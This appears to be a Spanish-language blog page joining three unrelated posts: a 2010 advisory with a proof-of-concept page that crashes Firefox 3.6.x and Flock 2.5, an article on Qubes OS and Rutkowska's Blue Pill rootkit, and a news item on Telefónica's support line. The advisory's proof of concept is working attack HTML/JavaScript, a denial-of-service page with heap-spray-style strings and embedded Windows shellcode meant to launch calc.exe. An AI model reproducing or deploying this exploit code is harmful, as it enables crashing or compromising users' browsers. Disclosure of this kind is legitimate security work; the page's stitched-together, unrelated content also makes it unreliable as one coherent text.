RootDev@blog:~$

##################################
Firefox 3.6.2 & 3.6.3 and flock 2.5 browsers uncaught excepcion error console DoS
URL del creador: http://www.mozilla.com
URL del creador: http://www.flock.com/
Reportado por: http://lostmon.blogspot.com/2010/04/firefox-362-363-and-flock-25-browsers.html
###################################

Firefox y Flock pueden ser colgados con una página con formato incorrecto, también intenta ver la consola de errores de Firefox y Flock debido a una excepcion no detectada y esto es un out of memory.

################
Versiones
################

firefox 3.6.2 and 3.6.3 vulnerable
Bugzilla:
https://bugzilla.mozilla.org/show_bug.cgi?id=557228

Flock 2.5 vulnerable

#################
Prueba de concepto
#################

<html>
<head>
<title> Bad 'throw' exception Remote DoS Flock browser 2.5 firefox 3.6.2 & 3.6.3</title>
</head>
<body onload="javascript:alert('Please Press Ctrl+Shift+J');">
<script language='JavaScript'>
var n=unescape('%uf1a4%u7ffd');
<!-- variant var n=unescape('%uc0c0%uc0c0%uc0c0'); --!>
<!-- Shellcode calc.exe but does not work --!>
var s=unescape('%uf631%u6456%u768b%u8b30%u0c76%u768b%u8b1c%u086e%u368b%u5d8b%u8b3c%u1d5c%u0178%u8beb%u184b%u7b8b%u0120%u8bef%u8f7c%u01fc%u31ef%u99c0%u1732%uc166%u01ca%u75ae%u66f7%ufa81%uf510%ue2e0%ucf75%u538b%u0124%u0fea%u14b7%u8b4a%u1c7b%uef01%u2c03%u6897%u652e%u6578%u6368%u6c61%u5463%u0487%u5024%ud5ffÌ');
for(var i=0;i<64;i++){
n=n+n;
document.write('<script>throw n+s;</scr'+'ipt>');
}
</script>
</head>
<body>
<center><h1> Bad 'throw' exception Remote DoS on firefox 3.6.x and Flock browser 2.5 </h1>
<h3>Based on the exploit from <a href="http://hacksafe.blogspot.com/">Nishant Das Patnaik</a><br />
Exploit modified by <a href="http://lostmon.blogspot.com">Lostmon</a> Lostmon@gmail.com to affects Flock and Firefox.
Remember to press ctrl+shift+j and make sure that your console log is in "all" tab or in "errors" tab , in firefox and flock :)</h3>

</center></body>
</html>

###################€nd ##########################

Thns to estrella to be my ligth
--
atentamente:
Lostmon (lostmon@gmail.com)
---
Traducción por; cLimbo
---
thz Lost ;-)

Un sistema operativo hipervirtualizado. Esto es, un sistema operativo construido a partir de docenas de máquinas virtuales, cada una de ellas atendiendo, enjaulando, aislando las piezas de software que controlan cada uno de nuestros recursos de cómputo. Esto es Qubes OS, un metasistema operativo diseñado por hackers para ser el más seguro del mundo. Pero, parafraseando a Lewis Carroll, comencemos por el principio.

Joanna Rutkowska, es polaca, experta en seguridad y hacker reconocida en 2006 por crear Blue Pill: un malware indetectable hecho con virtualización para tomar el control de Windows Vista. ¿Recuerdas a Neo tomando la “pastilla azul” en Matrix? Es el mismo concepto: Vista toma una píldora, el malware, y éste le transporta a un ambiente controlado por el Arquitecto Hipervisor, “al vuelo”, sin reiniciar el equipo. Blue Pill es un rootkit indetectable. El bagaje conseguido con ese y otros proyectos le permitieron avanzar hasta dar comienzo, hace seis meses, al desarrollo de Qubes soportado por su empresa Invisible Things Lab.

En el documento recientemente escrito por Joanna y su compatriota Rafal Wojtczuk, Qubes OS Architecture, encontrarás más información sobre el diseño interno del sistema y el par de premisas que lo sustentan:

1. Uno de los principales problemas de los sistemas operativos actuales, cualesquiera, es su incapacidad para aislar los procesos que se ejecutan en un máquina. De esa forma, si en navegador web se ve comprometido, el sistema operativo es incapaz de proteger otras aplicaciones de los usuarios y sus datos.

2. Por otro lado, es impráctico, ¿imposible?, tanto resolver todos los bugs posibles en el software como detectar todo el software malicioso. Esto hace necesario un nuevo enfoque para la creación sistemas operativo seguros. Comenzar desde cero esta tarea tampoco está cerca de la realidad, así que ¿por qué no usar/reutilizar software existente y modelar con él una arquitectura como la deseada?

El hipervisor de Xen permitió a Joanna y su equipo materializar esas ideas. La virtualización permite crear contenedores aislados, máquinas virtuales que se abstraen y apartan entre sí de mejor manera que los procesos normales hallados en todo sistema operativo. Aunado a esto, es importante apuntar que hoy en día cada vez más hardware permite virtualizar de manera más robusta y eficiente.

La versión actual de Qubes está sostenida por tres importantes columnas open source: Xen, el sistema X y Linux. En particular, Xen le sirve para crear máquinas virtuales en dos categorías principales:

1. AppVMs, dedicadas a aplicaciones de usuario (e.g., navegadores web, procesadores de texto).

2. SystemVMs, enfocadas en ofrecer servicios para todo el sistema (e.g., red, almacenamiento).

La imagen siguiente muestra la arquitectura del sistema. Nota que hay tres distintas AppVMs aislando navegadores y clientes de correo. Las tres SystemVMs “enjaulan” distintos recursos como la red y el almacenamiento (cifrado). Todas ellas están supervisadas por el Hipervisor de Xen.

El documento citado ofrece el análisis de distintos escenarios con potenciales vectores de ataque y cómo Qubes los enfrenta en comparación con los sistemas operativos tradicionales. Por ejemplo, ataques de bajo nivel como el cambio de MBR por uno malicioso: Qubes los detiene con un procedimiento de arranque seguro implementado con ayuda de hardware Intel TXT.

Qubes se encuentra en etapa alfa, pero según palabras de Joanna, ya es utilizable. Ella dice haber cambiado a Qubes desde hace un mes en su Mac Book. Lo usa para todo: trabajo, compras, banca electrónica, navegación web y para el desarrollo mismo de su sistema.



Aquí se muestra el menú de inicio de aplicaciones y la asignación que tienen por AppVM.

Como dicta el título de este artículo, Qubes ya está disponible, pero no como una distro estándar, sino a través de una serie de cinco pasos precisos en los que no profundizaré aquí:

1. Instalación de Fedora 12.
2. Instalación de Xen desde los repositorios de Qubes.
3. Instalación de Qubes.
4. Instalación de plantillas para las AppVMs.
5. Intercambio de la capa de red original por NetVM.

Concluyendo, Qubes:

• Implementa el paradigma de seguridad por aislamiento (no por oscuridad, por supuesto).
• Hoy es para Linux, aunque en el futuro esperan soportar Windows.
• Es Free/Libre Open Source Software.
• Es un metasistema operativo construido a partir de bloques de software existente.
• Representa un nivel de abstracción más alto, uno donde los procesos ahora son máquinas virtuales y el sistema operativo es un Hipervisor.
• Si hablamos del futuro de los sistemas operativos, hay dos extremos: los que están en la nube y este, llamado Qubes.

El lanzamiento público de Qubes fue hace tan solo unas horas. Por el momento, espero que este artículo alimente tu curiosidad y uno de estos días te animes a probarlo.



Vía | Bitelia

Telefónica puso hace unos días en funcionamiento su número de asistencia técnica gratuito 900 35 70 00 que sustituye a su antiguo 902. Hasta el momento este número está programado para resolver incidencias y preguntas a más de un millón de llamadas al mes.



Estas incidencias se pueden solucionar gracias a la labor de más de 1500 profesionales que se encargan de recepcionar las llamadas. De esta manera, todos los clientes tanto los particulares como las empresas podrán llamar de forma gratuita a este número para resolver sus dudas o problemas con sus conexiones de banda ancha.


Este servicio además ayuda a configurar equipos asociados al ADSL, como pueden ser las cuentas de correo gratuitas o los productos de seguridad comercializados por Telefónica. De este modo, se refuerza y se mejora la atención al cliente.


Vía | ADSLAyuda

############################################